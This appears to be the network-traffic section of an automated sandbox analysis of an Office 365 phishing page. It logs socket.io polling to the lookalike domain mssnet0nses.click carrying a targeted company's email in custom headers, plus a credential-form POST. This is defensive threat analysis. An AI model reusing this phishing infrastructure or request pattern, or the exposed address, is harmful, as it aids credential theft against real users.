            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrkYN HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrkYN HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=EMzR_z9H-w08ZyAdAAfc HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: ZpHJrjbXD+JNGF3LbCtN4w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrkmv&sid=EMzR_z9H-w08ZyAdAAfc HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrkmu&sid=EMzR_z9H-w08ZyAdAAfc HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrkmv&sid=EMzR_z9H-w08ZyAdAAfc HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrlUi HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrlUi HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrlkC&sid=LP9pboDna7Lg8G9ZAAfh HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=LP9pboDna7Lg8G9ZAAfh HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: X7uavfZo9qZLazeJs9Qkcg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrlkB&sid=LP9pboDna7Lg8G9ZAAfh HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrlkC&sid=LP9pboDna7Lg8G9ZAAfh HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrmGX HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrmGX HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrmWi&sid=p_0vHNI0wq1dN5-_AAfl HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrmWh&sid=p_0vHNI0wq1dN5-_AAfl HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=p_0vHNI0wq1dN5-_AAfl HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: ZSLh3OvhONTE4OrmLEX4xw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrmWi&sid=p_0vHNI0wq1dN5-_AAfl HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrnFW HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrnFW HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: www.oyabarista.com
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
            Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: mssnet0nses.click
            Source: unknownHTTP traffic detected: POST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1Host: www.oyabarista.comConnection: keep-aliveContent-Length: 147028Cache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Origin: https://www.oyabarista.comContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 13:41:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: max-age=14400, must-revalidateLink: <https://www.oyabarista.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1U%2Bk9gUniMBmSCvMHGoFCfN3uCbfV2pr7qw8OajNonIyprtF1UYWICfL7KCAAYXomRfuWcgjDJayA0yM0VupPPpSt20FjvJY16arwC%2FPXr4ho20eT6lp54qNsJB7abZW2qyAVDk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 926f4df4ff2e4544-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=84156&min_rtt=84134&rtt_var=17781&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1277&delivery_rate=36304&cwnd=252&unsent_bytes=0&cid=772a18d1f93e208e&ts=2818&x=0"
            Source: chromecache_119.6.drString found in binary or memory: https://fontawesome.com
            Source: chromecache_119.6.drString found in binary or memory: https://fontawesome.com/license/free
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
